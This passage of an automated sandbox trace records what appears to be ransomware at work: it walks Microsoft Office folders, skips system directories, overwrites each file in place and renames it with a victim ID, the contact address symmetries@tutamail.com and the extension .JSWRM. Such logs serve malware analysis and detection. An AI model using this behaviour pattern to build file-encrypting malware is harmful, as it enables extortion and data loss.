lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0122.677] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.677] WriteFile (in: hFile=0x238, lpBuffer=0x209878*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209878*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0122.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0122.678] CloseHandle (hObject=0x238) returned 1 [0122.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0122.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0122.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0122.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0122.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0122.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0122.678] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0122.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0122.678] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.678] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_STD_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_std_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_STD_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_std_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0122.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0122.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0122.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0122.679] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0122.679] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b93a5c4, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3b93a5c4, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b93a5c4, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="WINPROJ_STD_K_COL.HXK", cAlternateFileName="WINPRO~4.HXK")) returned 1 [0122.679] lstrcmpiW (lpString1="WINPROJ_STD_K_COL.HXK", lpString2=".") returned 1 [0122.679] lstrcmpiW (lpString1="WINPROJ_STD_K_COL.HXK", lpString2="..") returned 1 [0122.679] lstrcmpiW (lpString1="WINPROJ_STD_K_COL.HXK", lpString2="...") returned 1 [0122.679] lstrcmpiW (lpString1="WINPROJ_STD_K_COL.HXK", lpString2="windows") returned 1 [0122.679] lstrcmpiW (lpString1="WINPROJ_STD_K_COL.HXK", lpString2="recovery") returned 1 [0122.679] lstrcmpiW (lpString1="WINPROJ_STD_K_COL.HXK", lpString2="perflogs") returned 1 [0122.679] lstrcmpiW (lpString1="WINPROJ_STD_K_COL.HXK", lpString2="documents and settings") returned 1 [0122.679] lstrcmpiW (lpString1="WINPROJ_STD_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0122.679] lstrcmpiW (lpString1="WINPROJ_STD_K_COL.HXK", lpString2="system volume information") returned 1 [0122.679] lstrcmpiW (lpString1="WINPROJ_STD_K_COL.HXK", lpString2="msocache") returned 1 [0122.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_STD_K_COL.HXK", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0122.679] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0122.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_STD_K_COL.HXK", cchWideChar=21, lpMultiByteStr=0x240fe8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINPROJ_STD_K_COL.HXK", lpUsedDefaultChar=0x0) returned 21 [0122.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_STD_K_COL.HXK", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0122.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0122.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_STD_K_COL.HXK", cchWideChar=21, lpMultiByteStr=0x2411c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINPROJ_STD_K_COL.HXK", lpUsedDefaultChar=0x0) returned 21 [0122.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0122.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0122.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.680] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0122.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_STD_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_std_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.680] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0122.680] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0122.680] ReadFile (in: hFile=0x238, lpBuffer=0x209620, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209620*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0122.681] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.681] WriteFile (in: hFile=0x238, lpBuffer=0x209620*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209620*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0122.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0122.682] CloseHandle (hObject=0x238) returned 1 [0122.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0122.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0122.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0122.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0122.682] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0122.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0122.682] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.682] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_STD_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_std_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_STD_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_std_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0122.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0122.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0122.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0122.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0122.683] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x487bc7b, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x487bc7b, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x487bc7b, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x608, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="WINSCHD.VRD", cAlternateFileName="")) returned 1 [0122.683] lstrcmpiW (lpString1="WINSCHD.VRD", lpString2=".") returned 1 [0122.683] lstrcmpiW (lpString1="WINSCHD.VRD", lpString2="..") returned 1 [0122.683] lstrcmpiW (lpString1="WINSCHD.VRD", lpString2="...") returned 1 [0122.683] lstrcmpiW (lpString1="WINSCHD.VRD", lpString2="windows") returned 1 [0122.683] lstrcmpiW (lpString1="WINSCHD.VRD", lpString2="recovery") returned 1 [0122.683] lstrcmpiW (lpString1="WINSCHD.VRD", lpString2="perflogs") returned 1 [0122.683] lstrcmpiW (lpString1="WINSCHD.VRD", lpString2="documents and settings") returned 1 [0122.683] lstrcmpiW (lpString1="WINSCHD.VRD", lpString2="$RECYCLE.BIN") returned 1 [0122.683] lstrcmpiW (lpString1="WINSCHD.VRD", lpString2="system volume information") returned 1 [0122.683] lstrcmpiW (lpString1="WINSCHD.VRD", lpString2="msocache") returned 1 [0122.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0122.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINSCHD.VRD", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0122.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINSCHD.VRD", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINSCHD.VRD", lpUsedDefaultChar=0x0) returned 11 [0122.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0122.683] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0122.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINSCHD.VRD", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0122.683] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINSCHD.VRD", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINSCHD.VRD", lpUsedDefaultChar=0x0) returned 11 [0122.683] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0122.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0122.684] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0122.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.684] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0122.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winschd.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.685] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1544) returned 1 [0122.685] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.685] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x600) returned 0x2332c0 [0122.685] ReadFile (in: hFile=0x238, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x600, lpOverlapped=0x0) returned 1 [0122.686] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.686] WriteFile (in: hFile=0x238, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x600, lpOverlapped=0x0) returned 1 [0122.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0122.687] CloseHandle (hObject=0x238) returned 1 [0122.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0122.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0122.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0122.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0122.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0122.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0122.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0122.687] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0122.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.687] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.687] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winschd.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINSCHD.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winschd.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0122.688] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0122.688] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xee75a612, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee75a612, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xaf54f91, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x982d0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="WINWORD.HXS", cAlternateFileName="")) returned 1 [0122.688] lstrcmpiW (lpString1="WINWORD.HXS", lpString2=".") returned 1 [0122.688] lstrcmpiW (lpString1="WINWORD.HXS", lpString2="..") returned 1 [0122.688] lstrcmpiW (lpString1="WINWORD.HXS", lpString2="...") returned 1 [0122.688] lstrcmpiW (lpString1="WINWORD.HXS", lpString2="windows") returned 1 [0122.688] lstrcmpiW (lpString1="WINWORD.HXS", lpString2="recovery") returned 1 [0122.688] lstrcmpiW (lpString1="WINWORD.HXS", lpString2="perflogs") returned 1 [0122.688] lstrcmpiW (lpString1="WINWORD.HXS", lpString2="documents and settings") returned 1 [0122.688] lstrcmpiW (lpString1="WINWORD.HXS", lpString2="$RECYCLE.BIN") returned 1 [0122.688] lstrcmpiW (lpString1="WINWORD.HXS", lpString2="system volume information") returned 1 [0122.689] lstrcmpiW (lpString1="WINWORD.HXS", lpString2="msocache") returned 1 [0122.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0122.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINWORD.HXS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0122.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINWORD.HXS", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINWORD.HXS", lpUsedDefaultChar=0x0) returned 11 [0122.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0122.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0122.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINWORD.HXS", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0122.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINWORD.HXS", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINWORD.HXS", lpUsedDefaultChar=0x0) returned 11 [0122.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0122.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0122.689] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0122.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.689] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.689] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0122.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINWORD.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winword.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.689] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=623312) returned 1 [0122.689] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.690] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0122.690] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0122.702] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.702] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0122.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.704] CloseHandle (hObject=0x238) returned 1 [0122.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0122.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.704] RtlAllocateHeap 